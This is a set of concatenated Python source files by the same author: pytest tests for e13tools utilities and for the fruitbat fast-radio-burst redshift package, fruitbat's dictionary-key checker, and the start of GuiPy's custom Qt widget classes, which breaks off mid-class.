assert self.substitute_new_class3.__doc__ == "keyword"
assert self.substitute_new_class4.__doc__ == "positional"
assert self.substitute_new_class5.__doc__ == "keyword"
assert self.substitute_new_class7.__doc__ == "positional keyword"
assert self.substitute_new_class2.__name__ == 'substitute_new_class2'
assert self.substitute_new_class2.__module__ != 'e13tools.utils'
assert self.substitute_new_class3.__name__ == 'substitute_new_class3'
assert self.substitute_new_class3.__module__ != 'e13tools.utils'
assert self.substitute_new_class4.__name__ == 'substitute_new_class4'
assert self.substitute_new_class4.__module__ != 'e13tools.utils'
assert self.substitute_new_class5.__name__ == 'substitute_new_class5'
assert self.substitute_new_class5.__module__ != 'e13tools.utils'
# Pytest for the check_instance function
def test_check_instance():
# Check if providing a non-class raises an error
with pytest.raises(InputError):
check_instance(np.array(1), np.array)
# Check if providing an incorrect instance raises an error
with pytest.raises(TypeError):
check_instance(list(), np.ndarray)
# Check if providing a proper instance of a class returns True
assert check_instance(np.array(1), np.ndarray)
# Check if providing an improper instance of a class returns False
assert not check_instance(CustomSubClass(), CustomClass)
# Pytest for the delist function
def test_delist():
# Check if providing not a list raises an error
with pytest.raises(TypeError):
delist(np.array([1]))
# Check if provided list is delisted correctly
assert delist([[], (), [np.array(1)], [7], 8]) == [[np.array(1)], [7], 8]
# Pytest for the get_main_desc function
class Test_get_main_desc(object):
# Test if a function with a single paragraph is handled correctly
def test_single_paragraph(self):
# Create dummy function
def func():
"Test"
pass
# Check if the proper string is returned for func
assert (get_main_desc(func) == 'Test')
# Test if a function with multiple paragraphs is handled correctly
def test_multiple_paragraphs(self):
# Create dummy function
def func():
"""
Test.
More test.
1313e was right here, I swear!
"""
pass
# Check if the proper string is returned for func
assert (get_main_desc(func) == 'Test.')
# Test if a function with no docstring is handled properly
def test_no_docstring(self):
# Create dummy function
def func():
pass
# Check if None is returned for func
assert get_main_desc(func) is None
# Pytest for the get_outer_frame function
def test_get_outer_frame():
# Check if providing a wrong argument raises an error
with pytest.raises(InputError):
get_outer_frame('test')
# Check if providing a non-valid frame function returns None
assert get_outer_frame(get_outer_frame) is None
# Check if providing a valid function returns that frame
caller_frame = currentframe()
assert get_outer_frame(test_get_outer_frame) is caller_frame
# Check if providing a valid method returns the correct method
_Test()
# Pytest for the raise_error function
def test_raise_error():
# Create a logger and check if an error can be properly raised and logged
logger = logging.getLogger('TEST')
with pytest.raises(ValueError, match='ERROR'):
raise_error('ERROR', ValueError, logger)
try:
raise ValueError('Error')
except Exception as error:
with pytest.raises(ValueError, match='Test Error'):
raise_error('Test '+str(error), type(error), logger,
error.__traceback__)
# Pytest for the raise_warning function
def test_raise_warning():
# Create a logger and check if a warning can be properly raised and logged
logger = logging.getLogger('TEST')
with pytest.warns(UserWarning):
raise_warning('WARNING', UserWarning, logger)
# Pytest for the split_seq function
def test_split_seq():
# Check if the following inputs all yield the same answer
assert (split_seq('A', 1, 20.0, 'B') ==
split_seq(['A', 1, 2e1, 'B']) ==
split_seq("A 1 20. B") ==
split_seq([("A", 1), (["20."], "B")]) ==
split_seq("[(A / }| ; <1{}) , ,>20.0000 !! < )?% \\B") ==
['A', 1, 20.0, 'B'])
# Check if a complicated string sequence is converted correctly
assert (split_seq('[[]1e1,\n8.,A<{7)\\\\"True') ==
[10., 8.0, 'A', 7, '\\', True])
assert split_seq('A', 1, 20.0, 'B') == ['A', 1, 20.0, 'B']
# Pytest for the unpack_str_seq function
def test_unpack_str_seq():
# Check that the following inputs all yield the same answer
assert (unpack_str_seq('A', 1, 20.0, 'B') ==
unpack_str_seq(['A', 1, 2e1, 'B']) ==
unpack_str_seq("A, 1, 20.0, B") ==
unpack_str_seq([("A", 1), (["20.0"], "B")]) ==
'A, 1, 20.0, B')
# Check that providing a non-string separator raises an error
with pytest.raises(TypeError):
unpack_str_seq([], sep=1)
``` |
{
"source": "1313e/fruitbat",
"score": 2
} |
#### File: fruitbat/tests/test_fruitbat.py
```python
import os
import numpy as np
from glob import glob
import pytest
import pytest_mpl
from astropy.coordinates import SkyCoord
from astropy import units as u
import pyymw16 as ymw16
from fruitbat import Frb, utils, cosmologies, methods, table, plot, catalogue
class TestFrbClass:
# Create FRB objects for testing
frb = Frb(dm=1000, dm_excess=1000, name='simple_frb')
frb_raj_decj = Frb(dm=1000, raj="11:05:50.0", decj="-8:34:12.0")
frb_gl_gb = Frb(dm=1000, gl="30.5", gb="-60.2")
frb_w_s = Frb(dm=1000, width=30.0, peak_flux=20.0)
frb_host_known = Frb(dm=1000, dm_excess=900, z_host=1.0, dm_host_loc=200)
frb_dm_host_0 = Frb(dm=1000, dm_excess=900, z_host=1.0)
frb_dm_host_est = Frb(dm=1100, dm_host_est=100)
frb_energy = Frb(dm=1000, obs_bandwidth=400, width=1, peak_flux=2)
frb_energy_freq = Frb(dm=1000, obs_freq_central=0.4, width=1, peak_flux=2)
frb_utc = Frb(dm=1000, utc="1999-01-01T00:00:00.000")
frb_with_units = Frb(dm=1000, obs_bandwidth=400*u.MHz)
frb_fluence = Frb(dm=1000, fluence=2)
# Test that methods returns the correct value for DM=1000 and planck2018
def test_methods(self):
methods = {
"Ioka2003": 0.80856155,
"Inoue2004": 0.98344417,
"Zhang2018": 1.10879646
}
for method in methods.keys():
z = self.frb.calc_redshift(method=method, cosmology="Planck18")
assert np.isclose(z.value, methods[method]), "Fail: {}".format(method)
# Test that a ValueError is raised when an invalid method is given.
def test_invalid_method(self):
invalid_method = "jacqui1992"
with pytest.raises(ValueError):
self.frb.calc_redshift(method=invalid_method, cosmology="Planck18")
# Test that a ValueError is raised when an invalid cosmology is given.
def test_invalid_cosmology(self):
invalid_cosmology = "cosmos_1964"
with pytest.raises(ValueError):
self.frb.calc_redshift(cosmology=invalid_cosmology)
# Test raises error on dispersion measure less than zero
def test_frb_negative_dm(self):
with pytest.raises(ValueError):
Frb(dm=-1000)
# Test that the skycoords are calculated correctly when given raj and decj
def test_frb_calc_skycoords_raj_decj(self):
ra_str = "11:05:50.0"
dec_str = "-8:34:12.0"
skycoords = self.frb_raj_decj.calc_skycoords()
test_skycoords = SkyCoord(ra_str, dec_str, frame="icrs",
unit=(u.hourangle, u.deg))
ra, dec = skycoords.ra.value, skycoords.dec.value
test_ra, test_dec = test_skycoords.ra.value, test_skycoords.dec.value
assert np.isclose((ra, dec), (test_ra, test_dec)).all()
# Test that the skycoords are calculated correctly when given gl and gb
def test_frb_calc_skycoords_gl_gb(self):
gl_str = "30.5"
gb_str = "-60.2"
skycoords = self.frb_gl_gb.calc_skycoords()
test_skycoords = SkyCoord(gl_str, gb_str, frame="galactic", unit=u.deg)
gl, gb = skycoords.galactic.l.value, skycoords.galactic.b.value
test_gl, test_gb = test_skycoords.l.value, test_skycoords.b.value
assert np.isclose((gl, gb), (test_gl, test_gb)).all()
# Test that calc_skycoords raises an error if no coords are given
def test_frb_calc_skycoords_no_coords(self):
with pytest.raises(ValueError):
self.frb.calc_skycoords()
# Test fluence is calculated correctly when given width and peak_flux.
def test_frb_calc_fluence(self):
fluence = self.frb_w_s.calc_fluence()
assert np.isclose(fluence.value, 600.0)
# Test calc_fluence raises a ValueError if width and peak_flux are None.
def test_frb_calc_fluence_raise_error(self):
with pytest.raises(ValueError):
self.frb.calc_fluence()
# Test calc_dm_igm calculates the dm_igm correctly for a known host.
def test_frb_calc_dm_igm(self):
dm_igm = self.frb_host_known.calc_dm_igm()
assert np.isclose(dm_igm.value, 800.0)
# Test calc_dm_igm raises ValueError when z is None.
def test_frb_calc_dm_igm_z_none(self):
with pytest.raises(ValueError):
self.frb_w_s.calc_dm_igm()
# Test calc_dm_igm raises ValueError when dm_host is 0.0 and z is not None.
def test_frb_calc_dm_igm_dm_host_zero(self):
with pytest.raises(ValueError):
self.frb_dm_host_0.calc_dm_igm()
# Test calc_redshift with subract_host
def test_frb_calc_redshift_subtract_host(self):
dm_1 = self.frb_dm_host_est.calc_redshift(subtract_host=True)
dm_2 = self.frb.calc_redshift()
assert np.isclose(dm_1, dm_2)
# Test that calc_redshift will raise error if subtract_host is not a bool
def test_frb_subtract_host_not_bool(self):
with pytest.raises(ValueError):
self.frb_dm_host_est.calc_redshift(subtract_host="yes")
# Test calc_dm_galaxy calculates dm_galaxy correctly for given coordinates.
def test_frb_calc_dm_galaxy(self):
dm_galaxy = self.frb_raj_decj.calc_dm_galaxy()
dm_pymw16, t_sc_pymw16 = ymw16.dist_to_dm(
self.frb_raj_decj.skycoords.galactic.l,
self.frb_raj_decj.skycoords.galactic.b, 25000)
assert np.isclose(dm_galaxy.value, dm_pymw16.value)
# Test calc_dm_galaxy raises a ValueError when no coordinates are given
def test_frb_cal_dm_galaxy_no_coords(self):
with pytest.raises(ValueError):
self.frb.calc_dm_galaxy(model="ymw16")
def test_frb_calc_lum_dist_without_z(self):
with pytest.raises(ValueError):
self.frb.z = None
self.frb.calc_luminosity_distance()
# Test calc_energy calculates the energy of an FRB
def test_frb_calc_energy_bandwidth(self):
self.frb_energy.calc_redshift()
energy = self.frb_energy.calc_energy(use_bandwidth=True)
assert np.isclose(energy.value, 2.13256754066293e+40)
def test_frb_calc_energy_frequency(self):
self.frb_energy_freq.calc_redshift()
energy = self.frb_energy_freq.calc_energy()
assert np.isclose(energy.value, 2.13256754066293e+37)
def test_frb_calc_energy_no_fluence(self):
with pytest.raises(ValueError):
self.frb.calc_redshift()
self.frb.calc_energy(use_bandwidth=True)
def test_frb_calc_energy_no_bandwidth(self):
with pytest.raises(ValueError):
self.frb_fluence.calc_redshift()
self.frb_fluence.calc_energy(use_bandwidth=True)
def test_frb_calc_energy_no_frequency(self):
with pytest.raises(ValueError):
self.frb_energy.calc_redshift()
self.frb_energy.calc_energy()
def test_frb_calc_luminosity_bandwidth(self):
self.frb_energy.calc_redshift()
lum = self.frb_energy.calc_luminosity(use_bandwidth=True)
assert np.isclose(lum.value, 4.229828665e+43)
def test_frb_calc_luminosity_frequency(self):
self.frb_energy_freq.calc_redshift()
lum = self.frb_energy_freq.calc_luminosity()
assert np.isclose(lum.value, 4.2298286655e+40)
def test_frb_calc_luminosity_no_frequency(self):
with pytest.raises(ValueError):
self.frb_energy.calc_redshift()
self.frb_energy.calc_luminosity()
def test_frb_calc_comoving_distance(self):
self.frb.calc_redshift()
dist = self.frb.calc_comoving_distance()
assert np.isclose(dist.value, 3351.51321266)
def test_frb_pass_wrong_units(self):
with pytest.raises(ValueError):
Frb(dm=1000, obs_bandwidth=400*u.m)
# Test that the FRB __repr__ is printed
def test_frb__repr__(self):
print(self.frb)
# Test all methods and properties get values and print
def test_frb_attrs(self):
for d in dir(self.frb):
attr = getattr(self.frb, d)
print(attr)
def test_create_cosmology():
# Test FlatLambdaCDM
FlatLambdaCDM_params = {'H0': 67, 'Om0': 0.3, 'flat': True}
cosmologies.create_cosmology(FlatLambdaCDM_params)
# Test FlatwCDM
FlatwCDM_params = {'H0': 67, 'Om0': 0.3, 'flat': True, 'w0': 0.9}
cosmologies.create_cosmology(FlatwCDM_params)
# Test LambdaCDM
LambdaCDM_params = {'H0': 67, 'Om0': 0.3, 'Ode0': 0.8, 'flat': False}
cosmologies.create_cosmology(LambdaCDM_params)
# Test wCDM
wCDM_params = {'H0': 67, 'Om0': 0.3, 'Ode0': 0.8, 'flat': False, 'w0': 0.9}
cosmologies.create_cosmology(wCDM_params)
class Test_fz_integrand:
# Create default cosmology
cosmo = cosmologies.create_cosmology()
cosmo_w0 = cosmologies.create_cosmology({'w0': 1})
# Test _fz_integrand correctly computes for z = 0
def test_fz_integrand_z0(self):
fz = methods._f_integrand(0, self.cosmo)
assert np.isclose(fz, 1.0)
# Test _fz_integrand correctly computes for z = 2
def test_fz_integrand_z2(self):
fz = methods._f_integrand(2, self.cosmo)
assert np.isclose(fz, 1.011299)
def test_fz_integrand_w1_z1(self):
fz = methods._f_integrand(1, self.cosmo_w0)
assert np.isclose(fz, 0.291111)
# Test _check_keys_in_dict raises a KeyError when dict is missing keys
def test_check_keys_in_dict_missing():
required_keys = ["key1", "key2"]
dictionary = {"key1": 1, "otherkey": 2}
with pytest.raises(KeyError):
utils.check_keys_in_dict(dictionary, required_keys)
def test_check_keys_in_dict_all():
required_keys = ["key1", "key2"]
dictionary = {"key1": 1, "key2": 2}
result = utils.check_keys_in_dict(dictionary, required_keys)
assert result
class TestAddingMethods:
def new_method(self, z, cosmo):
return 1200 * z
def test_add_method(self):
methods.add_method("new_method", self.new_method)
assert "new_method" in methods.available_methods()
def test_reset_methods(self):
methods.reset_methods()
assert "new_method" not in methods.available_methods()
class TestCatalogue:
def test_create_analysis_catalogue(self):
catalogue.create_analysis_catalogue("pytest_output_analysis_catalogue")
assert os.path.exists("pytest_output_analysis_catalogue.csv")
def test_create_method_catalogue(self):
catalogue.create_methods_catalogue("pytest_output_methods_catalogue")
assert os.path.exists("pytest_output_methods_catalogue.csv")
class TestCreateTables:
def test_create_tables_normal(self):
method_list = methods.builtin_method_functions()
cosmology_list = cosmologies.builtin_cosmology_functions()
# Create a lookup table for each method and cosmology
for method in method_list:
for key in cosmology_list:
here = os.getcwd()
cosmo = cosmologies.builtin_cosmology_functions()[key]
filename = "_".join(["pytest_output", method, key])
table.create(method=method, filename=filename,
cosmo=cosmo, output_dir=here, zmin=0,
zmax=20, num_samples=10000)
# Compare new tables to existing tables for 4 dm values
pre_calc_fn = ".".join(["_".join([method, key]), "npz"])
new_calc_fn = "".join([filename, ".npz"])
pre_calc = table.load(pre_calc_fn)
new_calc = table.load(new_calc_fn, data_dir=here)
test_dm_list = [0, 100, 1000, 2000]
for dm in test_dm_list:
new_z = table.get_z_from_table(dm, new_calc)
pre_z = table.get_z_from_table(dm, pre_calc)
assert new_z == pre_z
def test_create_table_zhang_figm_free_elec(self):
cosmo = cosmologies.builtin_cosmology_functions()["Planck18"]
filename = "_".join(["pytest_output", "Zhang2018",
"Planck18", "figm_free_elec"])
here = os.getcwd()
table.create(method="Zhang2018", filename=filename, cosmo=cosmo,
output_dir=here, f_igm=0.5, free_elec=0.4)
def test_create_table_zhang_figm_error(self):
cosmo = cosmologies.builtin_cosmology_functions()["Planck18"]
with pytest.raises(ValueError):
table.create(method="Zhang2018", cosmo=cosmo, f_igm=-1)
def test_create_table_zhang_free_elec_error(self):
cosmo = cosmologies.builtin_cosmology_functions()["Planck18"]
filename = "_".join(["pytest_output", "Zhang2018",
"Planck18", "free_elec_error"])
with pytest.raises(ValueError):
table.create(method="Zhang2018", filename=filename, cosmo=cosmo,
free_elec=-1)
def test_create_table_invalid_method(self):
with pytest.raises(ValueError):
table.create(method="Webb1995")
class TestPlots:
# Test that the method plot creates an output file
def test_method_plot(self):
with pytest_mpl.plugin.switch_backend('Agg'):
plot.method_comparison(filename="pytest_output_method")
cwd = os.getcwd()
if not os.path.exists(os.path.join(cwd, "pytest_output_method.png")):
raise OSError
# Test that the cosmology plot creates and output file
def test_cosmology_plot(self):
with pytest_mpl.plugin.switch_backend('Agg'):
plot.cosmology_comparison(filename="pytest_output_cosmo")
cwd = os.getcwd()
if not os.path.exists(os.path.join(cwd, "pytest_output_cosmo.png")):
raise OSError
def test_cleanup():
# Remove the files at end of test
test_files = glob("*pytest_output*")
for file in test_files:
os.remove(file)
```
#### File: fruitbat/fruitbat/utils.py
```python
from __future__ import print_function, absolute_import, division
__all__ = ["check_keys_in_dict"]
def check_keys_in_dict(dictionary, keys):
"""
Checks that a list of keys exist in a dictionary.
Parameters
----------
dictionary: dict
The input dictionary.
keys: list of strings
The keys that the dictionary must contain.
Returns
-------
bool:
        Returns *True* if all required keys exist in the dictionary.
Otherwise a KeyError is raised.
"""
if not all(key in dictionary for key in keys):
        raise KeyError("Dictionary missing key values. "
                       "Requires: {}".format(keys))
return True
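# Hedged usage sketch (editor's addition, not part of the original module):
# demonstrates the True/KeyError behaviour with made-up dictionaries.
if __name__ == '__main__':
    # All required keys present -> returns True
    print(check_keys_in_dict({"dm": 1000, "z": 1.0}, ["dm", "z"]))
    # Missing 'z' -> raises KeyError
    try:
        check_keys_in_dict({"dm": 1000}, ["dm", "z"])
    except KeyError as err:
        print("Caught expected KeyError:", err)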
``` |
{
"source": "1313e/GuiPy",
"score": 2
} |
#### File: guipy/widgets/base.py
```python
from sys import platform
# Package imports
from qtpy import QtCore as QC, QtGui as QG, QtWidgets as QW
# GuiPy imports
# All declaration
__all__ = ['QAbstractButton', 'QAction', 'QCheckBox', 'QComboBox', 'QDialog',
'QDockWidget', 'QDoubleSpinBox', 'QFileDialog', 'QFontComboBox',
'QGroupBox', 'QHeaderView', 'QLabel', 'QLineEdit', 'QListView',
'QListWidget', 'QMainWindow', 'QMenu', 'QMessageBox', 'QPushButton',
'QRadioButton', 'QSpinBox', 'QSplitter', 'QScrollArea',
'QStackedWidget', 'QTabBar', 'QTableView', 'QTabWidget',
'QTextEdit', 'QToolBar', 'QToolButton', 'QToolTip', 'QWidget']
# %% BASE CLASS DEFINITION
# Make subclass of QWidget to provide certain functionality to all widgets
class QWidget(QW.QWidget):
"""
Defines the :class:`~QWidget` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QWidget` class and is inherited by all other
custom :class:`~PyQt5.QtWidgets.QWidget` classes.
"""
# Initialize QWidget
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Retrieve certain methods from parent
self.get_parent_methods()
# This function retrieves a set of methods from the parent if possible
def get_parent_methods(self):
# Obtain parent widget
parent = self.parentWidget()
# If this widget has a parent, retrieve a few methods if possible
if parent is not None:
# Retrieve the 'get_option' method if it exists
if(not hasattr(self, 'get_option') and
hasattr(parent, 'get_option')):
self.get_option = parent.get_option
# Override setStatusTip to auto translate
def setStatusTip(self, text):
super().setStatusTip(text)
# Override setToolTip to auto translate
def setToolTip(self, text):
super().setToolTip(text)
# Override childEvent to add 'get_option' if it exists to all children
def childEvent(self, event):
"""
Special :meth:`~PyQt5.QtCore.QObject.childEvent` event that
automatically calls the :meth:`~get_parent_methods` method on any
widget that becomes a child of this widget.
"""
# If this event involved a child being added, check child object
if(event.type() == QC.QEvent.ChildAdded):
# Obtain child object
child = event.child()
# If this child has the 'get_parent_methods' method, call it
if hasattr(child, 'get_parent_methods'):
child.get_parent_methods()
# Call and return super method
return(super().childEvent(event))
# Override setLocale to also set it for all children
def setLocale(self, locale):
# Set locale for this object
super().setLocale(locale)
# Also set this locale for all children that are widgets
for child in self.children():
if isinstance(child, QWidget):
child.setLocale(locale)
# %% CLASS DEFINITIONS
# Create custom QAbstractButton
class QAbstractButton(QW.QAbstractButton, QWidget):
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setSizePolicy(QW.QSizePolicy.Fixed, QW.QSizePolicy.Fixed)
# Make subclass of QW.QAction that automatically sets details based on status
class QAction(QW.QAction):
"""
Defines the :class:`~QAction` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QAction` class.
"""
# Override constructor
def __init__(self, parent, text, *, shortcut=None, tooltip=None,
statustip=None, icon=None, triggered=None, toggled=None,
role=None):
"""
Initializes the :class:`~QAction` class.
Parameters
----------
parent : :obj:`~PyQt5.QtWidgets.QWidget` object or None
            The parent widget for this action or *None* for no parent.
text : str
The label that this action must have.
Optional
--------
shortcut : :obj:`~PyQt5.QtGui.QKeySequence` or None. Default: None
The key sequence that must be set as the shortcut for this action.
If *None*, no shortcut will be set.
tooltip : str or None. Default: None
The text that must be set as the tooltip for this action.
If *None*, the tooltip is set to `text`.
If `shortcut` is not *None*, the tooltip will also include the
shortcut.
statustip : str or None. Default: None
The text that must be set as the statustip for this action.
If *None*, the statustip is set to `tooltip`.
icon : :obj:`~PyQt5.QtGui.QIcon` object or None. Default: None
The icon that must be set as the icon for this action.
If *None*, no icon will be set.
triggered : function or None. Default: None
The Qt slot function that must be called whenever this action is
triggered.
If *None*, no slot will be connected to this action's `triggered`
signal.
toggled : function or None. Default: None
The Qt slot function that must be called whenever this action is
toggled.
If *None*, no slot will be connected to this action's `toggled`
signal.
role : :obj:`~PyQt5.QtWidgets.QAction.MenuRole` object or None. \
Default: None
The menu role that must be set as the role of this action.
            If *None*, it is set to :obj:`~PyQt5.QtWidgets.QAction.NoRole`.
"""
# Call super constructor
if icon is None:
super().__init__(text, parent)
else:
super().__init__(icon, text, parent)
# Set all the details
self.setDetails(shortcut=shortcut,
tooltip=tooltip,
statustip=statustip)
# Set the triggered signal
if triggered is not None:
self.triggered.connect(triggered)
# Set the toggled signal
if toggled is not None:
self.toggled.connect(toggled)
self.setCheckable(True)
# Set the action menu role
self.setMenuRole(self.NoRole if role is None else role)
# Make new method that automatically sets Shortcut, ToolTip and StatusTip
def setDetails(self, *, shortcut=None, tooltip=None, statustip=None):
"""
Uses the provided `shortcut`; `tooltip`; and `statustip` to set the
details of this action.
Parameters
----------
shortcut : :obj:`~PyQt5.QtGui.QKeySequence` or None. Default: None
The key sequence that must be set as the shortcut for this action.
If *None*, no shortcut will be set.
tooltip : str or None. Default: None
The text that must be set as the tooltip for this action.
            If *None*, the tooltip is set to the action's text.
If `shortcut` is not *None*, the tooltip will also include the
shortcut.
statustip : str or None. Default: None
The text that must be set as the statustip for this action.
If *None*, the statustip is set to `tooltip`.
"""
# If shortcut is not None, set it
if shortcut is not None:
super().setShortcut(shortcut)
shortcut = self.shortcut().toString()
# If tooltip is None, its base is set to the action's name
if tooltip is None:
base_tooltip = self.text().replace('&', '')
tooltip = base_tooltip
# Else, provided tooltip is used as the base
else:
base_tooltip = tooltip
# If shortcut is not None, add it to the tooltip
if shortcut is not None:
tooltip = "%s (%s)" % (base_tooltip, shortcut)
# Set tooltip
super().setToolTip(tooltip)
# If statustip is None, it is set to base_tooltip
if statustip is None:
statustip = base_tooltip
# Set statustip
super().setStatusTip(statustip)
# Override setShortcut to raise an error when used
def setShortcut(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override setToolTip to raise an error when used
def setToolTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override setStatusTip to raise an error when used
def setStatusTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Create custom QCheckBox
class QCheckBox(QW.QCheckBox, QAbstractButton):
pass
# Create custom combobox class with more signals
class QComboBox(QW.QComboBox, QWidget):
"""
Defines the :class:`~QComboBox` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QComboBox` class.
"""
# Signals
popup_shown = QC.Signal([int], [str])
popup_hidden = QC.Signal([int], [str])
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setSizeAdjustPolicy(self.AdjustToContents)
# Override the showPopup to emit a signal whenever it is triggered
def showPopup(self, *args, **kwargs):
self.popup_shown[int].emit(self.currentIndex())
self.popup_shown[str].emit(self.currentText())
return(super().showPopup(*args, **kwargs))
# Override the hidePopup to emit a signal whenever it is triggered.
def hidePopup(self, *args, **kwargs):
self.popup_hidden[int].emit(self.currentIndex())
self.popup_hidden[str].emit(self.currentText())
return(super().hidePopup(*args, **kwargs))
# Create custom QFontComboBox class
class QFontComboBox(QW.QFontComboBox, QWidget):
# Signals
popup_shown = QC.Signal([int], [str])
popup_hidden = QC.Signal([int], [str])
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setSizeAdjustPolicy(self.AdjustToContents)
# Override the showPopup to emit a signal whenever it is triggered
def showPopup(self, *args, **kwargs):
self.popup_shown[int].emit(self.currentIndex())
self.popup_shown[str].emit(self.currentText())
return(super().showPopup(*args, **kwargs))
# Override the hidePopup to emit a signal whenever it is triggered.
def hidePopup(self, *args, **kwargs):
self.popup_hidden[int].emit(self.currentIndex())
self.popup_hidden[str].emit(self.currentText())
return(super().hidePopup(*args, **kwargs))
# Create custom QDialog
class QDialog(QW.QDialog, QWidget):
pass
# Create custom QDockWidget
# TODO: Add a context menu button to all dockwidgets by default?
class QDockWidget(QW.QDockWidget, QWidget):
pass
# Create custom QFileDialog class
class QFileDialog(QW.QFileDialog, QDialog):
pass
# Create custom QGroupBox class
class QGroupBox(QW.QGroupBox, QWidget):
pass
# Create custom QHeaderView class
class QHeaderView(QW.QHeaderView, QWidget):
pass
# Create custom QAbstractSpinBox that automatically sets some properties
class QAbstractSpinBox(QW.QAbstractSpinBox, QWidget):
"""
Defines the :class:`~QAbstractSpinBox` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QAbstractSpinBox` class.
"""
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
self.setStepType(self.AdaptiveDecimalStepType)
self.setAccelerated(True)
self.setGroupSeparatorShown(True)
self.setStyleSheet(
"""
QAbstractSpinBox {{
margin: {0}px 0px {0}px 0px;
max-height: 24px;}}
""".format("-1" if platform.startswith('linux') else '0'))
# Auto translate any special value text that is set
def setSpecialValueText(self, text):
super().setSpecialValueText(text)
# This function returns the value of this box
def get_box_value(self, *value_sig):
# Obtain the value of this box
value = self.value()
# If this value is the minimum, set it to the special value text
if self.specialValueText() and (value == self.minimum()):
value = self.specialValueText()
# Return value
return(value)
# This function sets the value of this box
def set_box_value(self, value, *value_sig):
# If the value is the same as the special value text, set to minimum
if value and (value == self.specialValueText()):
value = self.minimum()
# Set value
self.setValue(value)
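# Hedged usage sketch (editor's addition, assumes a running QApplication and
# uses the QSpinBox subclass defined below): with a special value text set,
# get_box_value()/set_box_value() translate between the minimum and that text.
#     box = QSpinBox()
#     box.setRange(0, 100)
#     box.setSpecialValueText('auto')
#     box.set_box_value('auto')     # internally stored as the minimum (0)
#     box.get_box_value()           # -> 'auto'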
# Create custom QDoubleSpinBox
class QDoubleSpinBox(QW.QDoubleSpinBox, QAbstractSpinBox):
pass
# Create custom QSpinBox
class QSpinBox(QW.QSpinBox, QAbstractSpinBox):
pass
# Create custom QLabel class with more signals
class QLabel(QW.QLabel, QWidget):
"""
Defines the :class:`~QLabel` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QLabel` class.
"""
# Signals
contentsChanged = QC.Signal([str], [QG.QMovie], [QG.QPicture],
[QG.QPixmap])
mousePressed = QC.Signal()
def __init__(self, text=None, *args, **kwargs):
# Call super constructor
if text is None:
super().__init__(*args, **kwargs)
else:
super().__init__(text, *args, **kwargs)
# Set some settings
self.setWordWrap(True)
self.setOpenExternalLinks(True)
# Override the mousePressEvent to emit a signal whenever it is triggered
def mousePressEvent(self, event):
self.mousePressed.emit()
event.accept()
# Override setMovie to emit a signal whenever it is called
def setMovie(self, movie):
super().setMovie(movie)
self.contentsChanged[QG.QMovie].emit(self.movie())
# Override setNum to emit a signal whenever it is called
def setNum(self, num):
super().setNum(num)
self.contentsChanged[str].emit(self.text())
# Override setPicture to emit a signal whenever it is called
def setPicture(self, picture):
super().setPicture(picture)
self.contentsChanged[QG.QPicture].emit(self.picture())
# Override setPixmap to emit a signal whenever it is called
def setPixmap(self, pixmap):
super().setPixmap(pixmap)
self.contentsChanged[QG.QPixmap].emit(self.pixmap())
# Override setText to emit a signal whenever it is called
def setText(self, text):
super().setText(text)
self.contentsChanged[str].emit(self.text())
# Create custom QLineEdit class
class QLineEdit(QW.QLineEdit, QWidget):
pass
# Create custom QListView class
class QListView(QW.QListView, QWidget):
pass
# Create custom QListWidget class
class QListWidget(QW.QListWidget, QWidget):
pass
# Create custom QMainWindow class
class QMainWindow(QW.QMainWindow, QWidget):
pass
# Create custom QMenu class
class QMenu(QW.QMenu, QWidget):
"""
Defines the :class:`~QMenu` class.
This class provides default settings and extra options for the
:class:`~PyQt5.QtWidgets.QMenu` class.
"""
def __init__(self, name, title=None, parent=None, *, tooltip=None,
statustip=None):
# Save name
self.name = name
# If title is None, set it to name
if title is None:
title = name
# Call super constructor
super().__init__(title, parent)
# Set all the details
self.setDetails(tooltip=tooltip,
statustip=statustip)
# Make new method that automatically sets ToolTip and StatusTip
def setDetails(self, *, tooltip=None, statustip=None):
"""
Uses the provided `tooltip` and `statustip` to set the details of this
menu action.
Parameters
----------
tooltip : str or None. Default: None
The text that must be set as the tooltip for this menu.
            If *None*, the tooltip is set to the menu's title.
statustip : str or None. Default: None
The text that must be set as the statustip for this menu.
If *None*, the statustip is set to `tooltip`.
"""
# Obtain the action that triggers this menu
menu_action = self.menuAction()
# If tooltip is None, it is set to the menu's name
if tooltip is None:
tooltip = self.title().replace('&', '')
# Set tooltip
menu_action.setToolTip(tooltip)
# If statustip is None, it is set to tooltip
if statustip is None:
statustip = tooltip
# Set statustip
menu_action.setStatusTip(statustip)
# Override setToolTip to raise an error when used
def setToolTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override setStatusTip to raise an error when used
def setStatusTip(self, *args, **kwargs):
raise AttributeError("Using this method is not allowed! Use "
"'setDetails()' instead!")
# Override addSection to automatically translate the given section name
def addSection(self, text, icon=None):
# Call super method
if icon is None:
return(super().addSection(text))
else:
return(super().addSection(icon, text))
# Create custom QMessageBox class
class QMessageBox(QW.QMessageBox, QDialog):
pass
# Create custom QPushButton class
class QPushButton(QW.QPushButton, QAbstractButton):
pass
# Create custom QRadioButton class
class QRadioButton(QW.QRadioButton, QAbstractButton):
pass
# Create custom QScrollArea class
class QScrollArea(QW.QScrollArea, QWidget):
pass
# Create custom QSplitter class
class QSplitter(QW.QSplitter, QWidget):
pass
# Create custom QStackedWidget class
class QStackedWidget(QW.QStackedWidget, QWidget):
pass
# Create custom QTabBar class
class QTabBar(QW.QTabBar, QWidget):
# Signals
tabTextChanged = QC.Signal(int, str)
# Override constructor to set some default settings
def __init__(self, *args, **kwargs):
# Call super constructor
super().__init__(*args, **kwargs)
# Use default settings
